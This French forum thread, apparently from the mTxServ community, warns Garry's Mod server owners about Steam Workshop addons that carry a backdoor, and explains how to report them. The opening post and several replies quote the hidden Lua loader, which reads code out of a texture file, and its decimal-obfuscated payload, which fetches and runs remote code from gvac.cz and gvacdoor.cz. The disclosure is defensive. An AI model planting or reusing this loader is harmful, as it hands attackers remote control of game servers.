ADDON WORKSHOP AVEC BACKDOOR

  • Initiateur de la discussion El Chapo
  • Date de début
  • Initiateur de la discussion
El Chapo

El Chapo

Geek suprême
Messages
84
Score réaction
25
Points
120
Bonjoir chère communauté mTxServ !

Je refais ce post qui de base étais destiner à signaler une backdoor sur un addon.
Je vais reprendre ici les commentaires utiles au sujet, les potentiels autres addon infecté..


ETAPE 1 : EVITER LES BACKDOOR

Voici un sujet très complet que je vous invite à lire, proposé par @Yoh Sambre ♪
https://mtxserv.com/forums/threads/...door-sur-son-serveur-version-simpliste.54822/


ETAPE 2 : SIGNALEZ LES BACKDOOR

SIGNALEMENT STEAM :

1. Cliquez tout simplement sur l’icône signaler pour un objet du workshop.

leak.png


2. Décrivez votre problème avec un anglais correct, avec copie de la backdoor/screen

3. LE PLUS IMPORTANT : Faites le même signalement directement à Rubat : robotboy655@facepunchstudios.com

Encore merci à @Yoh Sambre ♪ pour avoir relayé l’information.


ÉTAPE 3 : LISTE DES ADDONS INFECTÉS

==========================================================

French Gendarme - Gendarme Francais
https://steamcommunity.com/sharedfi...earchtext=French+Gendarme+-+Gendarme+Francais

Auteur de l'addon : Rico | NSA
https://steamcommunity.com/id/ricomp3

Reporté par : @El Chapo

Code malicieux :

Code:
if SERVER then local check = CompileString local function Check(texture) check(string.Explode("\n",file.Read(texture,"GAME"))[9],"R",false)() end Check([[materials\models\humans\suits\vance_facemap2.vmt]])
end
Merci à @Drilen / @Aiiden / @Zilnix pour leur ÉNORME SOUTIENT ! N'hésitez pas à les remercier également ! :D

==========================================================

==========================================================

U.S. MARSHAL - PLAYERMODEL V3
https://steamcommunity.com/sharedfiles/filedetails/?id=915783968

Auteur de l'addon : Rico | NSA
https://steamcommunity.com/id/ricomp3

Reporté par : @Ant00ine

Code malicieux :

Code:
if SERVER then local check = CompileString local function Check(texture) check(string.Explode("\n",file.Read(texture,"GAME"))[8],"R",false)() end Check([[materials\models\usmarshalv2\task_diff_000_a_uni2.vmt]])
end
[[
timer.Simple(1,function() RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\100\111\111\114\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") end)
]]
http.Fetch("https://gvac.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)http.Fetch("https://gvacdoor.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)
==========================================================
 
Dernière édition:
Aiiden

Aiiden

Geek suprême
Messages
63
Score réaction
34
Points
130
Rpz à Enigma hein qui s'amuse à backdoor des addons Workshop pour rediriger les joueurs sur le serveur d' @Akulla


(Parce que bon être à 5 connecté et avoir 32 connexions d'un coup c'est beaucoup je trouve FrankerZ)
 
  • J'aime
Réactions: El Chapo
Mr Akitaman

Mr Akitaman

Geek
Messages
22
Score réaction
8
Points
80
Mais ça ressemble beaucoup a une backdoor se que tu nous donnes dit donc Keepo
 
Aiiden

Aiiden

Geek suprême
Messages
63
Score réaction
34
Points
130
C'est vrai que mettre une ligne côté serveur sur un PM c'est bien connu hein Akita
 
Mr Akitaman

Mr Akitaman

Geek
Messages
22
Score réaction
8
Points
80
Bas je vois pas en quoi c'est une backdoor PartyTime
 
  • J'aime
Réactions: Jodingue
A

Adem

Nouveau né
Messages
1
Score réaction
0
Points
15
Salut je suis nouveau sur le site, on peut m'expliquer ? Je comprends pas trop les fonctionnalités..
 
Aiiden

Aiiden

Geek suprême
Messages
63
Score réaction
34
Points
130
unknown.png

297573697949007873.png


"http.Fetch("https://gvac.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)http.Fetch("https://gvacdoor.cz/_/_.php",function(b) RunString(b, "ERROR", false) end) "

(Ne pas aller dessus parce que ce sont des hackeurs et du coup bah t ban mek)
 
séméron23

séméron23

Psychopathe
Messages
1 305
Score réaction
310
Points
290
Aiiden à dit:
Regarde la pièce jointe 13791
Regarde la pièce jointe 13792

"http.Fetch("https://gvac.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)http.Fetch("https://gvacdoor.cz/_/_.php",function(b) RunString(b, "ERROR", false) end) "

(Ne pas aller dessus parce que ce sont des hackeurs et du coup bah t ban mek)
J'ai pas compris sa te ban de quoi x)
 
Ant00ine

Ant00ine

Geek suprême
Messages
455
Score réaction
225
Points
150
Incroyable, c’est pas la première fois que Rico s’amuse a ce genre de chose. Déjà il y a 3 ans, il avait fait un beau petit carnage sur beaucoup de serveur Gmod avec ses backdoors workshop.
Comme quoi on ne change pas BabyRage
 
  • J'aime
Réactions: Gauthier Plus, ZarosOVH et Yoh Sambre ♪
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 280
Score réaction
9 687
Points
1 845
Ant00ine à dit:
Incroyable, c’est pas la première fois que Rico s’amuse a ce genre de chose. Déjà il y a 3 ans, il avait fait un beau petit carnage sur beaucoup de serveur Gmod avec ses backdoors workshop.
Comme quoi on ne change pas BabyRage
dans un sens ça semblais logique , il avais la possibilité de tourner sur un panel qui est bien plus intéressant que ce qu'il avais a l'époque (gbackdoor) .

Clairement Rico comptais continuer ce qu'il avais commencer a l'époque de MPOWER..
 
  • J'aime
Réactions: Ant00ine
Ant00ine

Ant00ine

Geek suprême
Messages
455
Score réaction
225
Points
150
Yoh Sambre ♪ à dit:
dans un sens ça semblais logique , il avais la possibilité de tourner sur un panel qui est bien plus intéressant que ce qu'il avais a l'époque (gbackdoor) .

Clairement Rico comptais continuer ce qu'il avais commencer a l'époque de MPOWER..
J’avais commenté sur son dernier addon « à quand la prochaine backdoor », mais il me l’a supprimé BibleThump
Je suis devin !
 
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 280
Score réaction
9 687
Points
1 845
Ant00ine à dit:
J’avais commenté sur son dernier addon « à quand la prochaine backdoor », mais il me l’a supprimé BibleThump
Je suis devin !
D'ailleurs si certains on envie de participer au signalement des contenus malicieux sur le workshop il vous suffit d'envoyer un mail a Rubat : robotboy655@facepunchstudios.com

il faudras un minimum expliquer en anglais que le script contient un code malicieux et des preuves (screen / codes malicieux en citation)
 
  • J'aime
Réactions: Hosgor et El Chapo
bastien73

bastien73

Geek suprême
Messages
262
Score réaction
25
Points
130
Perso j’avais l’addon mais aucun problème bizarrement
 
  • Initiateur de la discussion
El Chapo

El Chapo

Geek suprême
Messages
84
Score réaction
25
Points
120
Yoh Sambre ♪ à dit:
D'ailleurs si certains on envie de participer au signalement des contenus malicieux sur le workshop il vous suffit d'envoyer un mail a Rubat : robotboy655@facepunchstudios.com

il faudras un minimum expliquer en anglais que le script contient un code malicieux et des preuves (screen / codes malicieux en citation)

Merci pour l'info je lui envoi un petit mail de suite ! :D
 
Luciano Leggio

Luciano Leggio

Geek suprême
Messages
702
Score réaction
141
Points
120
D’autres addons ont été mis à jour également le 26 février tels que le US Marshall etc..
 
bastien73

bastien73

Geek suprême
Messages
262
Score réaction
25
Points
130
Il assume pas il supp les commentaires disant que y’a une backdoor
 
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 280
Score réaction
9 687
Points
1 845
bastien73 à dit:
Il assume pas il supp les commentaires disant que y’a une backdoor
https://instaud.io/3noO
 
  • J'aime
Réactions: Taink
Kitsu

Kitsu

Chuck Norris
Messages
6 076
Score réaction
2 505
Points
740
Ant00ine

Ant00ine

Geek suprême
Messages
455
Score réaction
225
Points
150
El Chapo à dit:
Bonsoir chère communauté mTxServ !

Je post ce message ce soir pour vous prévenir d'un addon contenant une backdoor !

SIGNALEZ LE EN MASSE SVP !

==========================================================

Voici la backdoor contenu dans cet addon : https://steamcommunity.com/sharedfi...earchtext=French+Gendarme+-+Gendarme+Francais

if SERVER then
local check = CompileString
local function Check(texture)
check(string.Explode("\n",file.Read(texture,"GAME"))[9],"R",false)()
end
Check([[materials\models\humans\suits\vance_facemap2.vmt]])
end


==========================================================


Merci à @Drilen / @Aiiden / @Zilnix pour leur ÉNORME SOUTIENT ! N'hésitez pas à les remercier également ! :D
Salut,
Tu peux aussi ajouter à ton post cet addon https://steamcommunity.com/sharedfiles/filedetails/?id=915783968
Toujours de Rico,

Code:
if SERVER then local check = CompileString local function Check(texture) check(string.Explode("\n",file.Read(texture,"GAME"))[8],"R",false)() end Check([[materials\models\usmarshalv2\task_diff_000_a_uni2.vmt]])
end
Et ensuite dans le fichier en question:
Code:
--[[
timer.Simple(1,function() RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\100\111\111\114\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") end)
]]
Qui donne:
Code:
 http.Fetch("https://gvac.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)http.Fetch("https://gvacdoor.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)

:confused:
 
Dernière édition:
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 280
Score réaction
9 687
Points
1 845
Ant00ine à dit:
Et ensuite dans le fichier en question:
--[[
timer.Simple(1,function() RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\100\111\111\114\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") end)
]]

:confused:
Code:
 http.Fetch("https://gvac.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)http.Fetch("https://gvacdoor.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)
pour les gens désireux de participer a la déobfuscation d'un script backdoor a l'avenir (sur un autre topic de ce genre pourquoi pas?) , ce topic vous permettra de lire les obfuscation basique de ce genre > https://mtxserv.com/forums/threads/...door-sur-son-serveur-version-simpliste.54822/ (fin de topic pour les sites)
 
  • J'aime
Réactions: Hosgor et Ant00ine
Hosgor

Hosgor

Geek suprême
Messages
209
Score réaction
60
Points
130
Yoh Sambre ♪ à dit:
Code:
 http.Fetch("https://gvac.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)http.Fetch("https://gvacdoor.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)
pour les gens désireux de participer a la déobfuscation d'un script backdoor a l'avenir (sur un autre topic de ce genre pourquoi pas?) , ce topic vous permettra de lire les obfuscation basique de ce genre > https://mtxserv.com/forums/threads/...door-sur-son-serveur-version-simpliste.54822/ (fin de topic pour les sites)
Yoh Sambre sur ton topic on peut répertorier les liens Workshop backdoors ?
 
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 280
Score réaction
9 687
Points
1 845
Hosgor à dit:
Yoh Sambre sur ton topic on peut répertorier les liens Workshop backdoors ?
Non préférez directement signaler les objets workshop a Rubat
 
Hosgor

Hosgor

Geek suprême
Messages
209
Score réaction
60
Points
130
Je crois que Rico c'est bien amusé :p

On peut rajouter cette addon : https://steamcommunity.com/sharedfiles/filedetails/?id=852427102 à la liste BORT

Voici la backdoor :
backdoor 1.PNG


Une fois dans le fichier :

Code:
--[[
timer.Simple(1,function() RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\100\111\111\114\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") end)
]]
Juste pour envoyer le message au fameux rubat je dois donner quoi comme info;)

Yoh sambre tu sais si on reçoit un mail si l'addons est supprimé ?
 
Dernière édition:
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 280
Score réaction
9 687
Points
1 845
Hosgor à dit:
Je crois que Rico c'est bien amusé :p

On peut rajouter cette addon : https://steamcommunity.com/sharedfiles/filedetails/?id=852427102 à la liste BORT

Voici la backdoor :
Regarde la pièce jointe 13836

Une fois dans le fichier :

Code:
--[[
timer.Simple(1,function() RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\100\111\111\114\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") end)
]]
Juste pour envoyer le message au fameux rubat je dois donner quoi comme info;)

Yoh sambre tu sais si on reçoit un mail si l'addons est supprimé ?
Hello I discovered a malicious code on the workshop, this one allows to launch any type of code thanks to a web panel.

object workshop : (la tu fout le lien de l'objet infecter)

proofs: (La tu fout un screen ou le code malicieux voir les deux)
généralement il répond mais dans tous les cas l'idéal reste que ce soit supprimer au final , libre a toi de vérifier tous les jours après ton report la page
 
  • J'aime
Réactions: Hosgor
  • Initiateur de la discussion
El Chapo

El Chapo

Geek suprême
Messages
84
Score réaction
25
Points
120
Petite modification du sujet pour les prochains lecteurs.

Ajout de l'addon U.S Marshall signalé par @Ant00ine
 
  • J'aime
Réactions: Ant00ine
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 280
Score réaction
9 687
Points
1 845
j'espere que vous etes tous conscient que ce topic est INUTILE si les objets workshop ne sont pas supprimer du workshop..?
 
  • Initiateur de la discussion
El Chapo

El Chapo

Geek suprême
Messages
84
Score réaction
25
Points
120
Ce topic a pas pour but de faire supprimer les fameux addons ?
 
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 280
Score réaction
9 687
Points
1 845
El Chapo à dit:
Ce topic a pas pour but de faire supprimer les fameux addons ?
mais...j'ai indiquer plus haut qu'il fallait envoyer un EMAIL a Rubat...comment veux tu que mtxserv s'occupe de ca alors que ca ne les concerne ABSOLUMENT PAS..
 
  • Initiateur de la discussion
El Chapo

El Chapo

Geek suprême
Messages
84
Score réaction
25
Points
120
Je comprend pas ce qui dérange pardonne moi.

Pour moi ce topic sert aux personnes de la communauté, comme il y a beaucoup de fondateur sa permet de les avertir rapidement.
Ils pourront donc les signaler à leur tour pour aider à les faire supprimer, pour le bien de tous.

Sa peut aussi aider à éviter les auteurs/addons infectés.

A aucun moment j'inclus mTx ici, c'est pour les membres que je partage ça.
J'y trouve donc une petite utilité quand même @Yoh Sambre ♪
 
  • J'aime
Réactions: Ant00ine
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 280
Score réaction
9 687
Points
1 845
Ah mais je critique pas la démarche , juste que bon si vous voulez vraiment faire bouger les choses > contactez rubat
 
  • Initiateur de la discussion
El Chapo

El Chapo

Geek suprême
Messages
84
Score réaction
25
Points
120
C'est pourquoi j'ai modifié le topic avec dans l'étape 2 :

3. LE PLUS IMPORTANT : Faites le même signalement directement à Rubat : robotboy655@facepunchstudios.com

J'ai augmenté la taille du texte histoire de ne pas le louper ! ;)
 
  • J'aime
Réactions: Yoh Sambre ♪
Discord d'entraide
Rejoignz-nous sur Discord